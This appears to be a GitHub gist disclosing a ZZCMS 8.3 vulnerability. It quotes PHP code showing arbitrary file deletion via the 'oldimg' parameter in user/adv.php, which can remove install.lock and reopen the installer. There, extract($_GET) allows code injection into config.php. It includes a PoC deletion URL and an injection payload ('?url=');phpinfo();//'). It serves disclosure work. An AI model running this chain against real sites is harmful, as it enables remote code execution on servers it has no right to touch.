Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
zzcms_File_Delete_to_Code_Execution_1

zzcms_File_Delete_to_Code_Execution_1

PoC by Lz1y

ZZCMS the lastest version download page :

http://www.zzcms.net/about/6.htm

zip installer:

http://www.zzcms.net/download/zzcms8.3.zip

vulnerability code:

in file user/adv.php

include("../inc/conn.php");
include("check.php");
...
#line 37-66
if (isset($_REQUEST["action"])){
$action=$_REQUEST["action"];
}else{
$action="";
}
if (isset($_REQUEST["adv"])){
$adv=$_REQUEST["adv"];
}else{
$adv="";
}
if (isset($_REQUEST["advlink"])){
$advlink=$_REQUEST["advlink"];
}else{
$advlink="";
}
if (isset($_REQUEST["company"])){
$company=$_REQUEST["company"];
}else{
$company="";
}
if (isset($_REQUEST["img"])){
$img=$_REQUEST["img"];
}else{
$img="";
}
if (isset($_REQUEST["oldimg"])){
$oldimg=$_REQUEST["oldimg"];
}else{
$oldimg="";
}
...
#line 76-85
if ($action=="modify"){
query("update zzcms_textadv set adv='$adv',company='$company',advlink='$advlink',img='$img',passed=0 where username='".$_COOKIE["UserName"]."'");
//为了防止一个用户通过修改广告词功能长期霸占一个位置当用户修改广告词时只更新其内容不更新时间。
//deloldimg
if ($oldimg<>$img){
$f="../".$oldimg;
if (file_exists($f)){
unlink($f);
}}
...

When action($_REQUEST["action"]) is "modify" or "add", $oldimg($_REQUEST["oldimg"]) can be any file,attacker can delete any file like /install/install.lock, then let's see the code in /install/index.php:

<?php 
session_cache_limiter('private, must-revalidate');  //为了支持返回上一步页面回跳,//要放在session_start之前
if(!isset($_SESSION)){session_start();} 
//error_reporting(0);
//set_magic_quotes_runtime(0);//5.3后已不在支持
include '../inc/config.php';
include 'conn.php';
if($_POST) extract($_POST, EXTR_SKIP);//把数组中的键名直接注册为了变量。就像把$_POST[ai]直接注册为了$ai。
if($_GET) extract($_GET, EXTR_SKIP);
$submit = isset($_POST['submit']) ? true : false;
$step = isset($_POST['step']) ? $_POST['step'] : 1;

...
#line 105-116
		$fp="../inc/config.php";
		$f = fopen($fp,'r');
		$str = fread($f,filesize($fp));
		fclose($f);
		$str=str_replace("define('sqlhost','".sqlhost."')","define('sqlhost','$db_host')",$str) ;
		$str=str_replace("define('sqlport','".sqlport."')","define('sqlport','$db_port')",$str) ;
		$str=str_replace("define('sqldb','".sqldb."')","define('sqldb','$db_name')",$str) ;
		$str=str_replace("define('sqluser','".sqluser."')","define('sqluser','$db_user')",$str) ;
		$str=str_replace("define('sqlpwd','".sqlpwd."')","define('sqlpwd','$db_pass')",$str) ;
		$str=str_replace("define('siteurl','".siteurl."')","define('siteurl','$url')",$str) ;
		$str=str_replace("define('logourl','".logourl."')","define('logourl','$url/image/logo.png')",$str) ;
		$f=fopen($fp,"w+");//fopen()的其它开关请参看相关函数
...

because if($_GET) extract($_GET, EXTR_SKIP);,$url param bring code inject,like ?url=');phpinfo();//

So,there is a code execution by delete file.

POC:

http://lzy.com/user/adv.php?oldimg=install/install.lock&action=modify
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment